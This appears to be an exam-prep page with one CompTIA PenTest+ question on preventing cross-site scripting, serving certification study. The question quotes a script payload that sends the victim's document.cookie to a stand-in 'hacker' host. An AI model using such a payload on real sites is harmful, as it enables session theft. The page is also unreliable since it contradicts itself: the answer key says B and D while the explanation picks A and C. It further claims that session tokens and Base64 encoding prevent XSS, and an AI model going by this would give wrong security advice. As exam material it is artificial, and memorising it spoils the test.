CompTIA PenTest+ Exam: Preventing Code Injection Attacks

Preventing Code Injection Attacks

Question

Given the following code: <SCRIPT>var+img=new+Image();img.src='http://hacker/%20+%20document.cookie;</SCRIPT> Which of the following are the BEST methods to prevent against this type of attack? (Choose two.)

Answers

Explanations

Click on the arrows to vote for the correct answer

A. B. C. D. E. F.

BD.

The code provided in the question is an example of a cross-site scripting (XSS) attack, where the attacker injects malicious code into a web page viewed by other users. The code creates a new image object and sets its source to include the victim's cookie value, which is then sent to a remote server controlled by the attacker. To prevent this type of attack, we can use the following methods:

A. Web-application firewall: A web-application firewall (WAF) is a security solution that monitors and filters traffic to and from a web application. It can detect and block malicious requests, including XSS attacks. A WAF can also provide additional security features, such as rate limiting, IP blocking, and SSL/TLS offloading.

B. Parameterized queries: Parameterized queries are used to prevent SQL injection attacks. In this type of attack, the attacker injects malicious SQL code into a web application's database query, allowing them to view, modify, or delete sensitive data. Parameterized queries use placeholders for user input, which are then sanitized by the database engine, preventing the attacker from injecting malicious code.

C. Output encoding: Output encoding is a technique used to sanitize user input before it is displayed on a web page. It converts special characters, such as < and >, into their corresponding HTML entities, preventing the browser from interpreting them as HTML code. Output encoding can prevent XSS attacks, as it ensures that any user input displayed on a web page is treated as plain text.

D. Session tokens: Session tokens are unique identifiers assigned to a user when they log into a web application. They are used to maintain the user's session state and provide access control. Session tokens can prevent XSS attacks by limiting the attacker's ability to access sensitive data or perform actions on behalf of the user.

E. Input validation: Input validation is the process of verifying and sanitizing user input before it is processed by a web application. It can prevent a wide range of attacks, including XSS, SQL injection, and command injection. Input validation should be performed on both client-side and server-side to ensure that user input is safe and meets the expected format.

F. Base64 encoding: Base64 encoding is a technique used to encode binary data as ASCII text. It is often used to transmit data over networks that only support ASCII characters. Base64 encoding can be used to prevent XSS attacks by encoding user input before it is displayed on a web page. However, it is not a complete solution, as an attacker can still decode the encoded data and extract sensitive information.

In the given options, the best methods to prevent against the XSS attack in the code provided are web-application firewall (A) and output encoding (C). A web-application firewall can detect and block malicious requests, while output encoding can prevent the browser from interpreting user input as HTML code. However, it is important to note that implementing multiple layers of defense is always recommended to provide maximum protection against attacks.